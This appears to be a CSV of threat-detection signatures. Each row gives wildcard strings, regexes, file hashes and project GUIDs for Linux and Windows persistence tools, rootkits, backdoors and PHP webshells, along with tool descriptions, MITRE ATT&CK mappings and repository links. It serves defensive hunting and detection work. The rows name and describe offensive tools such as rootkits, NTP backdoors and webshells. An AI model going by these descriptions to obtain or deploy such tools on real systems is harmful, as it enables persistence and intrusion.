"*] Cleaning Shell profile persistence methods*",".{0,1000}\]\sCleaning\sShell\sprofile\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning SSH persistence methods*",".{0,1000}\]\sCleaning\sSSH\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Sudoers persistence methods*",".{0,1000}\]\sCleaning\sSudoers\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Systemd Generator persistence methods*",".{0,1000}\]\sCleaning\sSystemd\sGenerator\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning Systemd persistence methods*",".{0,1000}\]\sCleaning\sSystemd\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning udev persistence methods*",".{0,1000}\]\sCleaning\sudev\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] Cleaning XDG persistence methods*",".{0,1000}\]\sCleaning\sXDG\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*] CreateService by Uknow*",".{0,1000}\]\sCreateService\sby\sUknow.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#content","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*] Eventviewer Persistence created*",".{0,1000}\]\sEventviewer\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*] Extension Hijacking Persistence created*",".{0,1000}\]\sExtension\sHijacking\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*] Hidden task xml file: *",".{0,1000}\]\sHidden\stask\sxml\sfile\:\s.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*] Powershell Persistence created*",".{0,1000}\]\sPowershell\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*] Screensaver Persistence created*",".{0,1000}\]\sScreensaver\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*] Startup Persistence created*",".{0,1000}\]\sStartup\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*] UserInitMprLogonScript Persistence created*",".{0,1000}\]\sUserInitMprLogonScript\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*<h1>.:NCC:. Shell v*",".{0,1000}\<h1\>\.\:NCC\:\.\sShell\sv.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php text webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*<H1><center>-=[+] IDBTEAM SHELLS*",".{0,1000}\<H1\>\<center\>\-\=\[\+\]\sIDBTEAM\sSHELLS.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#content","php text webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*<h2>Laudanum Tools*",".{0,1000}\<h2\>Laudanum\sTools.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php text webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*<head><title>Wardom | Ne Mutlu T*",".{0,1000}\<head\>\<title\>Wardom\s\|\sNe\sMutlu\sT.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*<SharedFolder name=""*"" hostPath=""C:\"" writable=""true""/>*",".{0,1000}\<SharedFolder\sname\=\"".{0,1000}\""\shostPath\=\""C\:\\\""\swritable\=\""true\""\/\>.{0,1000}","greyware_tool_keyword","VirtualBox","adding the entire C drive as a shared folder for a VM","T1021.001 - T1137 - T1072","TA0006 - TA0008 - TA0005","N/A","RagnarLocker ","Persistence","https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<title>Dynasty Persist</title>*",".{0,1000}\<title\>Dynasty\sPersist\<\/title\>.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*<title>Sosyete Safe Mode Bypass Shell -*",".{0,1000}\<title\>Sosyete\sSafe\sMode\sBypass\sShell\s\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*<title>SyRiAn Sh3ll ~*",".{0,1000}\<title\>SyRiAn\sSh3ll\s\~.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*<title>WebRoot Hack Tools""*",".{0,1000}\<title\>WebRoot\sHack\sTools\"".{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*=[ 1n73ct10n privat shell ]=*",".{0,1000}\=\[\s1n73ct10n\sprivat\sshell\s\]\=.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*--==[[ Andela Yuwono Priv8 Shell ]]==--*",".{0,1000}\-\-\=\=\[\[\sAndela\sYuwono\sPriv8\sShell\s\]\]\=\=\-\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*===[[[ A Black Path Toward The Sun ]]]===*",".{0,1000}\=\=\=\[\[\[\sA\sBlack\sPath\sToward\sThe\sSun\s\]\]\]\=\=\=.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*>Near-Future Command Scheduler<*",".{0,1000}\>Near\-Future\sCommand\sScheduler\<.{0,1000}","greyware_tool_keyword","atnow","AtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TA","T1053 - T1059","TA0002 ","N/A","APT18 - APT29 - APT32 - Cobalt - RTM","Persistence","https://www.nirsoft.net/utils/atnow.html","1","0","#description","N/A","7","7","N/A","N/A","N/A","N/A"
"*>SandmanBackdoorTimeProvider<*",".{0,1000}\>SandmanBackdoorTimeProvider\<.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#productname","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*>Seatbelt<*",".{0,1000}\>Seatbelt\<.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#productname","fp risks","8","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*006c52fa111f12a54c8c543f5e7421f3841bae6d5a4e16054943a5aa5e9633b7*",".{0,1000}006c52fa111f12a54c8c543f5e7421f3841bae6d5a4e16054943a5aa5e9633b7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*00D7268A-92A9-4CD4-ADDF-175E9BF16AE0*",".{0,1000}00D7268A\-92A9\-4CD4\-ADDF\-175E9BF16AE0.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*01feeebb7db49be46eb416caf2975ff62e79061c77e20430fb0d2df578b307c1*",".{0,1000}01feeebb7db49be46eb416caf2975ff62e79061c77e20430fb0d2df578b307c1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79*",".{0,1000}021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*023fbd9f1d087ec3cb0761e01d95503f055e72209f85513380ed1b32177ef570*",".{0,1000}023fbd9f1d087ec3cb0761e01d95503f055e72209f85513380ed1b32177ef570.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5*",".{0,1000}0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#filehash","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*032bf57408a5cc20cb45e19dc494fa0ee9dcd3b70b0c606698dd9af4e689268b*",".{0,1000}032bf57408a5cc20cb45e19dc494fa0ee9dcd3b70b0c606698dd9af4e689268b.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136*",".{0,1000}037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136*",".{0,1000}037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*03c387fcf1090b813124a067e3434845c6242e7d6d4f0a835f78a96d6fb6f731*",".{0,1000}03c387fcf1090b813124a067e3434845c6242e7d6d4f0a835f78a96d6fb6f731.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362*",".{0,1000}05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*05B4EB7F-3D59-4E6A-A7BC-7C1241578CA7*",".{0,1000}05B4EB7F\-3D59\-4E6A\-A7BC\-7C1241578CA7.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#GUIDproject","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad*",".{0,1000}0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*06a4364e32aacbd0d0385b51fd849a72cd52e99964610c6a108ab2ac07603342*",".{0,1000}06a4364e32aacbd0d0385b51fd849a72cd52e99964610c6a108ab2ac07603342.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*06a53f84d7e034e563a8fc3747000bcdc6b9945efd0ecbc990322ff527b3ad04*",".{0,1000}06a53f84d7e034e563a8fc3747000bcdc6b9945efd0ecbc990322ff527b3ad04.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*06AF1D64-F2FC-4767-8794-7313C7BB0A40*",".{0,1000}06AF1D64\-F2FC\-4767\-8794\-7313C7BB0A40.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924*",".{0,1000}070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*0790530e1e0f1ed73b2b6fd701d75a2409c785af5367304d5fdd5bdfdf7eae46*",".{0,1000}0790530e1e0f1ed73b2b6fd701d75a2409c785af5367304d5fdd5bdfdf7eae46.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*07c90800861a9cb41dd71f0af41af0ce1b174fccf71bf88abc6d82f0208b2d78*",".{0,1000}07c90800861a9cb41dd71f0af41af0ce1b174fccf71bf88abc6d82f0208b2d78.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581*",".{0,1000}07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1*",".{0,1000}080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1*",".{0,1000}0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*",".{0,1000}09323E4D\-BE0F\-452A\-9CA8\-B07D2CFA9804.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","#GUIDproject","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084*",".{0,1000}0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced*",".{0,1000}0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0b199cc96ae7a68fcd8236cd2f995347c02e8a3ac7311584f6ed87b3dd50cf65*",".{0,1000}0b199cc96ae7a68fcd8236cd2f995347c02e8a3ac7311584f6ed87b3dd50cf65.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0b8feec02a5f7915868a1ecf83aa101aa1627d9d41fa27a95352ee3f20f79508*",".{0,1000}0b8feec02a5f7915868a1ecf83aa101aa1627d9d41fa27a95352ee3f20f79508.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#filehash","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215*",".{0,1000}0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0byt3m1n1-V2*",".{0,1000}0byt3m1n1\-V2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
